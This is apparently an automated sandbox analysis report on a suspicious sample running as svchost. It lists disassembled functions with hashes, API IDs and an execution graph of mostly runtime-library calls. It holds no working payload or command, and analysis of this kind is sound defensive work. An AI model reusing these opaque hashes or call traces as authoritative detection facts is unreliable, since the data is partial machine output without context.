                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction ID: 82c07dca5fec95baba9f378b8bcf349adc563c236f808c71cbf1495a5745f5a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 787e2ccd3a4a2f0807cc7fcfab9808ef1bc99af934d1353d068844bd3f29b985
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C318829F05B51A6FA98EF96D65876B77B0FB44B80F0448309F4847756EF78C461C300
                                                                                                                                                                                                                                                Function 0000022F4B9325C8 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                                                • Opcode ID: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction ID: 632627886c9981b52a14242c3f56d560826b91c40156f8e9911ff3f61bbd3599
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef5328ec8df5305a5bebb05340c2e4b6dc17e77d604934f64985ec379b581ae8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41D12536B04A80AAEB64DFB5D6643AD37B1F348798F005236CF5D97B9ADA74C446C340
                                                                                                                                                                                                                                                Function 0000022F4B932EF0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 953036326-0
                                                                                                                                                                                                                                                • Opcode ID: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction ID: 12ce6cab9b8894c3c6566c6d1aae896e90d10aa2224d90d2c7332629effa8fdd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 43d1806d22cf26bb578584b1f50928cd79f72239213f1d2f409b9d03dcc02cf4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D491E46AF18650A5FB94AFE5C6683AF3BB0B309B88F146139DF0A57686DBB5C441C700
                                                                                                                                                                                                                                                Function 0000022F4B927970 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2933794660-0
                                                                                                                                                                                                                                                • Opcode ID: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction ID: 2cb522077bb50c674a43f2988a2ed3e59d3cc267632043fb8723bf62793d84b7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c25137996cf865269d3dc01569cfdf526b316795659beb4b1a68d386b57b9efa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE117026B14F119AEB40DFA0E8693A933B4F319758F041E31DB6D467A5DFB8D1A4C340
                                                                                                                                                                                                                                                Function 0000022F4B922544 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction ID: b608a874e44f2305b233afc4306f34f56234126c79960913b43b4cc47d399d02
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2214ffb8d2229323086ad34a8b531e28ba158b85d1d3dbad5c7c70fb1dba52b7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA71D33AE04781A5FABCEEA5DA683AB77B4F349784F410836DF0947B56DAB8C504C740
                                                                                                                                                                                                                                                Function 0000022F4B8F7980 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 3242871069-1018135373
                                                                                                                                                                                                                                                • Opcode ID: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction ID: d579fb0e5277af242517fb2064b3d8564f185edefe4acbfc8ab0500f452aee6c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34f41f65ebeee98072c04c36ffcb08d764f10b3598a8f5a66480d6cdd8a7e9c2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A51D23EB11600AAFB94EF95E548F6A33B2E345B99F518131EB454778AF7B8C942C700
                                                                                                                                                                                                                                                Function 0000022F4B8FA3C0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CallTranslator
                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                • API String ID: 3163161869-2084237596
                                                                                                                                                                                                                                                • Opcode ID: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction ID: ab93b7f2c9ef5ec5a384a78b9da373c566539d412b0c40a8a94e7e3587639ae1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ebe29515744ec85b4c7a5c69406529571aeda380531785c74bea0d93e5ddae6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6261E636904BC491D7B0AF55E544B9BB7B0F798799F044235EB9803B96EBBCC192CB00
                                                                                                                                                                                                                                                Function 0000022F4B922338 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileType
                                                                                                                                                                                                                                                • String ID: \\.\pipe\
                                                                                                                                                                                                                                                • API String ID: 3081899298-91387939
                                                                                                                                                                                                                                                • Opcode ID: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction ID: cce46f0fa1378ea43ad5cf95f61130987cd79dd7c1dd67fdc4edc1ecf2f10c6f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee842ef1b9af794ce5f9c57276e32575cf678b56a57e7c1674317c9bf9c17d00
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A651B32AE08380A1FEADAEA5E27876B77A1B385740F444935DF4903B9BCABDC505C740
                                                                                                                                                                                                                                                Function 0000022F4B932C60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                • Opcode ID: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction ID: 055a778cff11323dffc1db978895651ca4ad035b3ed6653d7e204861c88b4515
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6a2d2f89dbe45a9fea545bcb4aa06eef1d3c7bdcbbdd9a8edf910a903994b9b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF41C366B14A4092EBA0EF65E5583AA77B1F388784F445031EF4E87799EBBCC445C710
                                                                                                                                                                                                                                                Function 0000022F4B928A58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                • Opcode ID: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction ID: 0c024b3125dcca8c1982990d9c76ca101d53b80ce949555d51dd3c997593c46a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d7810ab3a0ec9818877cf1b3e283a106e6e962497adc233d094785ed36f44b7e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF118B36A08B8082EBA48F14E55424A77E4FB88B84F194630EF8C07765EF7CC451CB00
                                                                                                                                                                                                                                                Function 0000022F4B921BFC Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 756756679-0
                                                                                                                                                                                                                                                • Opcode ID: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction ID: 5234f3ecd236f550e97028695711534056cca23beb260fb795f50d6a260626a6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1e98e18f6346a7606d876eb22bc804523d63b476fed3d5047e07684f33477b56
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74115E29E01B5491FA88EFE6E51822A77B1FB89FC0F1894349F4D43766DEB8C462C300
                                                                                                                                                                                                                                                Function 0000022F4B921268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1617791916-0
                                                                                                                                                                                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction ID: 3e1e9a40939542c600504de3384a6c328f8b6d35d2671f485f6e89c9c26a68de
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6CE03939A0160486EB44AFA2D92834A3AE1EB8DB06F04D0348E0907352DFBD8499C750

                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                Execution Coverage:0.9%
                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                                Total number of Nodes:1633
                                                                                                                                                                                                                                                Total number of Limit Nodes:10
                                                                                                                                                                                                                                                execution_graph 8372 13de2732010 8375 13de272f200 8372->8375 8376 13de272f20d 8375->8376 8377 13de272f252 8375->8377 8381 13de272d46c 8376->8381 8379 13de272f23c 8398 13de272eed8 8379->8398 8382 13de272d47d FlsGetValue 8381->8382 8383 13de272d498 FlsSetValue 8381->8383 8384 13de272d492 8382->8384 8395 13de272d48a 8382->8395 8385 13de272d4a5 8383->8385 8383->8395 8384->8383 8386 13de272dc3c _invalid_parameter_noinfo 7 API calls 8385->8386 8387 13de272d4b4 8386->8387 8388 13de272d4d2 FlsSetValue 8387->8388 8389 13de272d4c2 FlsSetValue 8387->8389 8391 13de272d4f0 8388->8391 8392 13de272d4de FlsSetValue 8388->8392 8390 13de272d4cb 8389->8390 8393 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8390->8393 8394 13de272d104 _invalid_parameter_noinfo 7 API calls 8391->8394 8392->8390 8393->8395 8396 13de272d4f8 8394->8396 8395->8379 8396->8395 8397 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8396->8397 8397->8395 8421 13de272f148 8398->8421 8405 13de272ef43 8406 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8405->8406 8408 13de272ef2a 8406->8408 8407 13de272ef52 8445 13de272f27c 8407->8445 8408->8377 8411 13de272f04e 8412 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8411->8412 8413 13de272f053 8412->8413 8417 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8413->8417 8414 13de272f0a9 8416 13de272f110 8414->8416 8456 13de272ea08 8414->8456 8415 13de272f068 8415->8414 8418 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8415->8418 8420 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8416->8420 8417->8408 8418->8414 8420->8408 8422 13de272f16b 8421->8422 8423 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8422->8423 8425 13de272f175 8422->8425 8424 13de272f188 8423->8424 8424->8425 8426 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8424->8426 8427 13de272ef0d 8425->8427 8428 13de272d46c 12 API calls 8425->8428 8426->8425 8431 13de272ebd8 8427->8431 8429 13de272f23c 8428->8429 8430 13de272eed8 39 API calls 8429->8430 8430->8427 8469 13de272e724 8431->8469 8434 13de272ebf8 GetOEMCP 8437 13de272ec1f 8434->8437 8435 13de272ec0a 8436 13de272ec0f GetACP 8435->8436 8435->8437 8436->8437 8437->8408 8438 13de272cf7c 8437->8438 8439 13de272cfc7 8438->8439 8443 13de272cf8b _invalid_parameter_noinfo 8438->8443 8441 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8439->8441 8440 13de272cfae HeapAlloc 8442 13de272cfc5 8440->8442 8440->8443 8441->8442 8442->8405 8442->8407 8443->8439 8443->8440 8444 13de272bdcc _invalid_parameter_noinfo EnterCriticalSection 8443->8444 8444->8443 8446 13de272ebd8 19 API calls 8445->8446 8447 13de272f2a9 8446->8447 8448 13de272f3ff 8447->8448 8450 13de272f2e6 IsValidCodePage 8447->8450 8455 13de272f300 8447->8455 8545 13de2727950 8448->8545 8450->8448 8452 13de272f2f7 8450->8452 8451 13de272f045 8451->8411 8451->8415 8453 13de272f326 GetCPInfo 8452->8453 8452->8455 8453->8448 8453->8455 8534 13de272ecf0 8455->8534 8457 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8456->8457 8458 13de272ea24 8457->8458 8459 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8458->8459 8462 13de272ea51 8458->8462 8460 13de272eac0 8459->8460 8616 13de272dae0 8460->8616 8463 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8462->8463 8466 13de272eb03 8462->8466 8464 13de272eb61 8463->8464 8465 13de272dae0 _invalid_parameter_noinfo 20 API calls 8464->8465 8465->8466 8467 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8466->8467 8468 13de272eb9d 8466->8468 8467->8468 8468->8416 8470 13de272e743 8469->8470 8471 13de272e748 8469->8471 8470->8434 8470->8435 8471->8470 8477 13de272d398 8471->8477 8473 13de272e763 8512 13de273096c 8473->8512 8478 13de272d3ad Concurrency::details::SchedulerProxy::DeleteThis 8477->8478 8479 13de272d3bc FlsGetValue 8478->8479 8480 13de272d3d9 FlsSetValue 8478->8480 8481 13de272d3d3 8479->8481 8485 13de272d3c9 _invalid_parameter_noinfo 8479->8485 8482 13de272d3eb 8480->8482 8480->8485 8481->8480 8483 13de272dc3c _invalid_parameter_noinfo 7 API calls 8482->8483 8484 13de272d3fa 8483->8484 8486 13de272d418 FlsSetValue 8484->8486 8487 13de272d408 FlsSetValue 8484->8487 8488 13de272d452 8485->8488 8496 13de272d47d FlsGetValue 8485->8496 8497 13de272d498 FlsSetValue 8485->8497 8490 13de272d424 FlsSetValue 8486->8490 8491 13de272d436 8486->8491 8489 13de272d411 8487->8489 8488->8473 8493 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8489->8493 8490->8489 8492 13de272d104 _invalid_parameter_noinfo 7 API calls 8491->8492 8494 13de272d43e 8492->8494 8493->8485 8495 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8494->8495 8495->8485 8498 13de272d492 8496->8498 8502 13de272d48a 8496->8502 8499 13de272d4a5 8497->8499 8497->8502 8498->8497 8500 13de272dc3c _invalid_parameter_noinfo 7 API calls 8499->8500 8501 13de272d4b4 8500->8501 8503 13de272d4d2 FlsSetValue 8501->8503 8504 13de272d4c2 FlsSetValue 8501->8504 8502->8473 8506 13de272d4f0 8503->8506 8507 13de272d4de FlsSetValue 8503->8507 8505 13de272d4cb 8504->8505 8508 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8505->8508 8509 13de272d104 _invalid_parameter_noinfo 7 API calls 8506->8509 8507->8505 8508->8502 8510 13de272d4f8 8509->8510 8510->8502 8511 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8510->8511 8511->8502 8513 13de2730981 8512->8513 8514 13de272e786 8512->8514 8513->8514 8520 13de2730fcc 8513->8520 8516 13de27309d8 8514->8516 8517 13de27309ed 8516->8517 8518 13de2730a00 8516->8518 8517->8518 8531 13de272f260 8517->8531 8518->8470 8521 13de272d398 _invalid_parameter_noinfo 17 API calls 8520->8521 8522 13de2730fdb 8521->8522 8523 13de272cf0c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 8522->8523 8526 13de2731014 8522->8526 8524 13de2731004 8523->8524 8527 13de273103c 8524->8527 8526->8514 8528 13de273104e Concurrency::details::SchedulerProxy::DeleteThis 8527->8528 8530 13de273105b 8527->8530 8529 13de2730d24 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8528->8529 8528->8530 8529->8530 8530->8526 8532 13de272d398 _invalid_parameter_noinfo 17 API calls 8531->8532 8533 13de272f269 8532->8533 8535 13de272ed2d GetCPInfo 8534->8535 8536 13de272ee23 8534->8536 8535->8536 8541 13de272ed40 8535->8541 8537 13de2727950 _log10_special IsProcessorFeaturePresent 8536->8537 8538 13de272eec2 8537->8538 8538->8448 8550 13de2731ab4 8541->8550 8546 13de2727959 8545->8546 8547 13de2727964 8546->8547 8548 13de2728128 IsProcessorFeaturePresent 8546->8548 8547->8451 8549 13de2728140 capture_previous_context 8548->8549 8549->8451 8551 13de272e724 17 API calls 8550->8551 8552 13de2731af6 8551->8552 8570 13de272f5ec 8552->8570 8571 13de272f5f5 MultiByteToWideChar 8570->8571 8619 13de272d978 8616->8619 8620 13de272d9a3 8619->8620 8627 13de272da14 8620->8627 8622 13de272d9ca 8624 13de272d9ed 8622->8624 8633 13de272cd10 8622->8633 8625 13de272da02 8624->8625 8626 13de272cd10 _invalid_parameter_noinfo 20 API calls 8624->8626 8625->8462 8626->8625 8644 13de272d75c 8627->8644 8629 13de272da4f _invalid_parameter_noinfo 8629->8622 8630 13de272da3e _invalid_parameter_noinfo 8630->8629 8631 13de272d978 _invalid_parameter_noinfo 20 API calls 8630->8631 8632 13de272daf9 8631->8632 8632->8622 8634 13de272cd68 8633->8634 8635 13de272cd1f Concurrency::details::SchedulerProxy::DeleteThis 8633->8635 8634->8624 8636 13de272d5d8 _invalid_parameter_noinfo 10 API calls 8635->8636 8637 13de272cd4e _invalid_parameter_noinfo 8636->8637 8637->8634 8638 13de272cd10 _invalid_parameter_noinfo 20 API calls 8637->8638 8639 13de272cd97 8638->8639 8662 13de27309a0 8639->8662 8645 13de272d7a3 _invalid_parameter_noinfo 8644->8645 8646 13de272d778 Concurrency::details::SchedulerProxy::DeleteThis 8644->8646 8645->8630 8648 13de272d5d8 8646->8648 8649 13de272d5f7 FlsGetValue 8648->8649 8651 13de272d60c 8648->8651 8650 13de272d604 8649->8650 8649->8651 8650->8645 8651->8650 8652 13de272dc3c _invalid_parameter_noinfo 7 API calls 8651->8652 8653 13de272d62e 8652->8653 8654 13de272d64c FlsSetValue 8653->8654 8657 13de272d63c 8653->8657 8655 13de272d658 FlsSetValue 8654->8655 8656 13de272d66a 8654->8656 8655->8657 8658 13de272d104 _invalid_parameter_noinfo 7 API calls 8656->8658 8659 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8657->8659 8660 13de272d672 8658->8660 8659->8650 8661 13de272dcb4 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8660->8661 8661->8650 8663 13de272cdbf 8662->8663 8664 13de27309b9 8662->8664 8666 13de2730a0c 8663->8666 8664->8663 8665 13de2730fcc _invalid_parameter_noinfo 17 API calls 8664->8665 8665->8663 8667 13de2730a25 8666->8667 8669 13de272cdcf 8666->8669 8668 13de272f260 _invalid_parameter_noinfo 17 API calls 8667->8668 8667->8669 8668->8669 8669->8624 8670 13de2722810 8672 13de2722856 8670->8672 8671 13de27228bc 8672->8671 8674 13de2723858 8672->8674 8675 13de272387a 8674->8675 8676 13de2723865 StrCmpNIW 8674->8676 8675->8672 8676->8675 8677 13de272d814 8679 13de272d84e capture_current_context 8677->8679 8678 13de272d8e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8680 13de272d938 8678->8680 8679->8678 8681 13de2727950 _log10_special IsProcessorFeaturePresent 8680->8681 8682 13de272d957 8681->8682 8683 13de2731a18 8684 13de2731a20 8683->8684 8685 13de2731a35 8684->8685 8688 13de2731a4e 8684->8688 8686 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 8685->8686 8687 13de2731a3a 8686->8687 8689 13de272dae0 _invalid_parameter_noinfo 20 API calls 8687->8689 8690 13de272e724 17 API calls 8688->8690 8691 13de2731a45 8688->8691 8689->8691 8690->8691 9103 13de272d698 9104 13de272d6a8 9103->9104 9105 13de272d510 Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 9104->9105 9106 13de272d6b3 __vcrt_uninitialize_ptd 9104->9106 9105->9106 9668 13de272b998 9675 13de272b8cb __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 9668->9675 9669 13de272b9bf 9670 13de2728c04 _CallSETranslator 5 API calls 9669->9670 9671 13de272b9c4 9670->9671 9672 13de2728c04 _CallSETranslator 5 API calls 9671->9672 9674 13de272b9cf __FrameHandler3::GetHandlerSearchState 9671->9674 9672->9674 9673 13de272a068 5 API calls Is_bad_exception_allowed 9673->9675 9675->9669 9675->9673 9675->9674 9677 13de272a090 9675->9677 9678 13de2728c04 _CallSETranslator 5 API calls 9677->9678 9679 13de272a09e 9678->9679 9679->9675 9107 13de272589c 9108 13de27258a3 9107->9108 9109 13de27258d0 VirtualProtect 9108->9109 9111 13de27257e0 9108->9111 9110 13de27258f9 GetLastError 9109->9110 9109->9111 9110->9111 9308 13de2733b1b 9309 13de2733dc0 9308->9309 9310 13de2733b5b 9308->9310 9311 13de2733db6 9309->9311 9315 13de27348d0 _log10_special 9 API calls 9309->9315 9310->9309 9312 13de2733b8f 9310->9312 9313 13de2733da2 9310->9313 9316 13de27348d0 9313->9316 9315->9311 9319 13de27348f0 9316->9319 9320 13de273490a 9319->9320 9321 13de27348eb 9320->9321 9323 13de2734730 9320->9323 9321->9311 9324 13de2734770 _log10_special 9323->9324 9326 13de27347dc _log10_special 9324->9326 9334 13de27349f0 9324->9334 9327 13de2734819 9326->9327 9328 13de27347e9 9326->9328 9341 13de2734d20 9327->9341 9337 13de273460c 9328->9337 9331 13de2734817 _log10_special 9332 13de2727950 _log10_special IsProcessorFeaturePresent 9331->9332 9333 13de2734841 9332->9333 9333->9321 9347 13de2734a18 9334->9347 9338 13de2734650 _log10_special 9337->9338 9339 13de2734665 9338->9339 9340 13de2734d20 _log10_special 7 API calls 9338->9340 9339->9331 9340->9339 9342 13de2734d40 9341->9342 9343 13de2734d29 9341->9343 9344 13de272dc1c Concurrency::details::SchedulerProxy::DeleteThis 7 API calls 